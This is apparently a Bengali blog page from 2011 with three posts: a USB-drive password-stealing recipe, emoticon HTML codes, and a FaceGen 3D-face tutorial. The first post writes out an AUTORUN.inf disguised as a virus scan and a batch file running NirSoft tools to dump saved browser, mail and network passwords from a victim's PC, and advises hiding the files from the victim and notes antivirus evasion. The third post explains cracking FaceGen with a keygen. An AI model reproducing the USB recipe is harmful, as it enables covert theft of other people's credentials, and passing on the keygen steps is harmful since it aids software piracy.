Search This Blog

Monday, October 17, 2011

শুধুমাত্র পেনড্রাইভ লাগিয়েই হাতিয়ে নিন পিসির সব পাসওয়ার্ড!!!

হ্যাকিং বিষয়ে চুলকানি থাকলে দূরে থাকুন। 

আজকাল সবার কাছেই পেনড্রাইভ আছে বলা যায়। একজনের পিসি থেকে আরেক জনের পিসিতে অবাধে বিচরন করছে এই পেনড্রাইভ। আর এই পেনড্রাইভকেই ব্যবহার করতে পারেন হ্যাকিং এর ছোট হাতিয়ার হিসেবে।:P শুধু পেনড্রাইভই নয় মেমরি কার্ড দিয়েও একই কাজ করা সম্ভব! তাহলে চলুন শুরু করা যাক।


 

প্রথমে দুইটা ফাইল বানাতে হবে। নাম ধরেন AUTORUN এবং LAUNCH।
একটা নোট প্যাড খুলুন। তারপর টাইপ করুন

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

এখন সেভ করুন AUTORUN.inf নামে।

আবার নোট প্যাড খুলুন। তারপর টাইপ করুন

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

এখন সেভ করুন LAUNCH.bat নামে। আপনি আপনার মতো কাস্টোমাইজও করে নিতে পারেন।

এখন এই সাইটে যান। 
এখানে থেকে আপনার প্রয়োজনীয় সফটওয়্যার ডাউনলোড করে নিতে পারেন।

এত ঝামেলা না করতে চাইলে সরাসরি এখান থেকে এই ফাইলটি ডাউনলোড করে নিন। তারপর Extract করে ফোল্ডারের সব ফাইলগুলো আপনার পেনড্রাইভে কপি করুন। বলা যায় আপনার কাজ শেষ।

এখন এই পেনড্রাইভ যে কারও পিসিতে প্রবেশ করালেই পেয়ে যাবেন সব সেভ করা পাসওয়ার্ড!
**শর্ত প্রযোজ্য :P

যার পিসিতে প্রবেশ করাবেন তার AUTORUN অফ করা থাকলে সরাসরি কাজ করবে না। তবে আপনি যদি সুযোগ বুঝে LAUNCH নামক ফাইলটি ডাবল ক্লিক করে ওপেন করে ফেলেন তাহলেই কেল্লা ফতে! আর যদি AUTORUN অফ না করা থাকে তাহলেতো আর কিছুই করা লাগবে না। অটো সব পাসওয়ার্ড হ্যাক হয়ে যাবে। :D
আর মজার কথা হলো AUTORUN ফাইলটা ছাড়া আর কোন ফাইল এন্টিভাইরাস ধরতে পারবে না। তাই নির্ভয়ে হ্যাক চালিয়ে যেতে পারবেন। ;)

কিভাবে হ্যাক করা পাসওয়ার্ডগুলো দেখবেন? খুব সহজ! আপনার পেনড্রাইভ ফোল্ডারে দেখুন
WebBrowserPassView নামসহ কিছু টেক্সট ফাইল তৈরি হয়েছে। সব পাসওয়ার্ড এই টেক্সট ফাইলেই পাবেন। এভাবে আপনি Internet Explorer, Mozilla Firefox (All Versions), Google Chrome, and Opera এর সব সেভ করা পাসওয়ার্ড হাতিয়ে নিতে পারবেন। :mrgreen:

**সতর্কতা স্বরুপ আপনি ফাইলগুলো হিডেন করে রাখতে পারেন। যাতে ভিক্টিম বুঝতে না পারে।** ;):P

কিভাবে বাচবেন এমন হ্যাকারের হাত থেকে? তেমন কিছু না।
AUTORUN অফ করে রাখুন+ মাস্টার পাসওয়ার্ড ব্যবহার করুন। মজিলার Tools -> Options -> Security / Passwords -> Use a master password কাজ শেষ!

আশা করি আপনাদের ভাল লেগেছে।
ধন্যবাদ সবাইকে।


Thursday, October 13, 2011

প্রথমআলো ব্লগে ব্যবহার উপযোগী ইমোর ভান্ডারঃ ইমোপেডিয়া!!!


প্রথমআলো ব্লগে ব্যবহার উপযোগী ইমোর ভান্ডারঃ ইমোপেডিয়া!!!

 ব্লগে পর্যাপ্ত পরিমান ও মানের ইমোটিকন নাই, এজন্য আমাদেক সবসময়ই থার্ডপার্টির ইমোটিকন ব্যবহার করতে হয়। ব্লগের ইমোটিকনগুলো একেবারে মরা মরা, আবার অন্য যেগুলো ব্যবহার করা হয়, সেগুলি বেশ ছোট। তাই আপনাদের জন্য একটু মাঝারি সাইজের কিছু ইমো নিয়েই মাঝে মাঝে পোষ্ট দিয়েছিলাম। আজ ৩য় কিস্তি, সাথে থাকছে আগের ইমো পোষ্টের লিংক। আগে যারা মিস করেছেন আজ এই পোষ্টেই সব পেয়ে যাবেন। আজকের ইমোগুলি বাংলা ডায়ালগ দেওয়া। যা গুল্লী.কম থেকে নেওয়া। এই সাইটের ইমোগুলি সামুব্লগের ব্যবহারোপযোগী করে কোড দেওয়া আমি এই ব্লগে ব্যবহারের জন্য ব্যবস্থা করে দিলামঃ 

 |ইমোর ১ম ভান্ডার|

|ইমোর ২য় ভান্ডার|

প্রথমে নিয়মগুলি ভালো করে দেখে নিন, অনেকেই ভুল করেন কোডিং এ।যেভাবে পোষ্টে/মন্তব্যে ইমো দিবেন-ধাপগুলি খেয়াল করুন। নিচে প্রতিটা ইমোর আগে নাম দেয়া আছে, যার এক্সটেনসন হলো .gif। প্রথমে পছন্দমত ইমো বেছে নিন, এরপর ইমোর উপর রাইট ক্লিক করুন, যদি মযিলা ব্রাউজার হয় তাহলে Copy image location এ ক্লিক করে ঐ ইমোর লিংক কপি করুন।(নিচের ছবি)


আর ইন্টারনেট এক্সপ্লোরার হলে copy shortcut এ ক্লিক করে ঐ ইমোর লিংক কপি করুন।(নিচের ছবি)


এবার উপরের নিয়মে ইমোর লিংক কপি করে নিচের দেখানো কোডে link of EMO এর জায়গায় পেষ্ট করে পোষ্টে/মন্তব্যে পেষ্ট করুন পুরা কোড। তবে অবশ্যই কোডের সবটেক্সটগুলো একসাথে রাখতে হবে, আমি নিচের কোডের ১ম ও শেষ স্মলার/গ্রেটার দ্যান চিহ্ন একটু সরে দিয়েছি, যাতে কোড কপি করতে পারেন, একসাথে রাখলে কোড দেখা যাবে না।

< img src="link of EMO" width="480" height="400"/ >

অথবা নিচের ইমোগুলোর প্রথমে যে নাম আছে শুধু সেই নামটা কপি করে নিচের মত করে কোডে দিনঃ

< img src="http://gullee.com/smilies/ইমোর নাম দিন এখানে"/ >

এবার সেই বাংলায় ডাবিং ইমো 

bangladesh.gif 


bangladesh1.gif 


bangladesh2.gif 


bangladesh3.gif 





10 


15 



19 



21 


22 


23 


25 



30 


34 


35 


39 


42 


46 


65 


66 


67 


47 


55 

60 


62 


63 


64 

আশা করি সবাই ইমো দিতে পারবেন।

এই বাংলাইমোগুলো www.gullee.com থেকে নেওয়া।

Wednesday, October 12, 2011

নিজের চেহারা দিয়ে তৈরি করুন এ্যানিমেটেড ছবি! (3D মডেল)


নিজের চেহারা দিয়ে তৈরি করুন এ্যানিমেটেড ছবি! (3D মডেল)

নিজের ছবিকে এ্যানিমেটেড ছবিতে রুপান্তর করলে দেখতে কেমন হবে? কখনো ভেবে দেখেছেন কি? আর যারা গেম তৈরি করতে পারেন পারেন তারাতো নিজের ছবি দিয়েই গেম বানাতে পারবেন। হ্যা নিজের চেহারাকে এ্যানিমেটেড ছবি বা 3D মডেলে রুপান্তর করতে পারেন FaceGen Modeller নামের এই অসাধারন সফটওয়্যার দিয়ে। এ সফটওয়্যার দিয়ে খুব সহজেই 3D ফেস তৈরি করা যায়।

এক নজরে দেখে নিন সুবিধাগুলিঃ

  • ইচ্ছে মতো ছবি দিয়ে ফেস বানানো যায়।
  • ফেস যে কোন বয়সের বানাতে পারবেন।
  • এক ছবি দিয়েই ছেলে বা মেয়ের ফেস বানাতে পারবেন। :P
  • মাউস দিয়ে ক্লিক করে বা ড্রাগ করে ফেসে অনেক রকম ইম্প্রেশন তৈরী করতে পারবেন।
  • Export করতে পারবেন 3D Studio (3DS), Maya ASCII (ma) ইত্যাদি সফটে।
  • আর ছবিকে JPEG, BMP ফরম্যাটে সেভ করতেও পারবেন।
আরও বিস্তারিত জানুন এখানে।

আগে

পরে

দেখুন কিভাবে ছেলে থেকে মেয়ে হচ্ছে। :P
তারপর দেখুন তরুণী থেকে বৃদ্ধা হয়েছে। ;)

যেভাবে তৈরি করবেনঃ

নিচের চিত্রে মতো PhotoFit>Next>Load এ ক্লিক করে ছবি দিন।
তারপরের ধাপে চিত্রের মতো দেখিয়ে দিন।
তারপর Start Now তে ক্লিক করে ১-৩ মিনিট অপেক্ষা করুন। এরপর দেখবেন আপনার 3D মডেল তৈরি হয়ে গেছে। :D
আরও বিস্তারিত জানতে এ ভিডিওটি দেখুন।

কিছু সতর্কতাঃ

  • দাঁত দেখা যায় এমন ছবি ব্যবহার করবেন না।
  • চশমাসহ ছবি ব্যবহার করবেন না।
  • মাথায় ক্যাপ বা টুপি পরিহিত ছবি ব্যবহার করবেন না।
  • আরো বিস্তারিত ভিডিওতে জানতে পারবেন।
তাহলে আর দেরি কেন? এখনই তৈরি করে ফেলুন।

ডাউনলোডঃ

FaceGen Modeller 3.4.1 

যেভাবে ফুল ভার্শন করবেনঃ

kg.exe ফাইল ওপেন করুন।
এখানে Site Code নামের একটা ঘর পাবেন। Site Code পাবেন হলো সফটওয়্যারের Help>Registration।
ঐখান থেকে Site Code টা কপি করে Keymaker এর Site Code নামের ঘরে পেস্ট করে Generate বাটনে ক্লিক করুন।
মনে রাখবেন স্পেস গুলা মুছে দিতে হবে।
এরপর সিরিয়াল কী পাবেন যা দিয়ে করে নিন ফুলভার্শন।
আশা করি সবার কাজে আসবে।
ধন্যবাদ সবাইকে।